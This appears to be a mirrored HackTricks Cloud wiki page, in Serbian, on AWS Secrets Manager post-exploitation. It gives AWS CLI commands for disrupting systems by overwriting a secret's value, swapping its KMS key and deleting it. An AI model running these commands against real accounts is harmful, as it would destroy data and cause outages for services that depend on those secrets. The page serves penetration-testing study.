gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-02-04 19:11:41 -08:00
Code Issues Packages Projects Releases Wiki Activity
Files
c60a82f15573f9d029cecd113986ef5ed020e966
hacktricks-cloud/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md

1.3 KiB
Raw Blame History

AWS - Post Eksploatacija Secrets Manager-a

{{#include ../../../banners/hacktricks-training.md}}

Secrets Manager

Za više informacija pogledajte:

{{#ref}} ../aws-services/aws-secrets-manager-enum.md {{#endref}}

Čitanje Tajni

Tajne same su osetljive informacije, proverite stranicu za privesc da biste saznali kako ih pročitati.

DoS Promena Vrednosti Tajne

Promenom vrednosti tajne mogli biste DoS-ovati ceo sistem koji zavisi od te vrednosti.

Warning

Imajte na umu da su prethodne vrednosti takođe sačuvane, tako da je lako jednostavno se vratiti na prethodnu vrednost.

# Requires permission secretsmanager:PutSecretValue
aws secretsmanager put-secret-value \
--secret-id MyTestSecret \
--secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}"

DoS Promena KMS ključa

aws secretsmanager update-secret \
--secret-id MyTestSecret \
--kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE

DoS Brisanje Tajne

Minimalan broj dana za brisanje tajne je 7

aws secretsmanager delete-secret \
--secret-id MyTestSecret \
--recovery-window-in-days 7

{{#include ../../../banners/hacktricks-training.md}}

Reference in New Issue View Git Blame Copy Permalink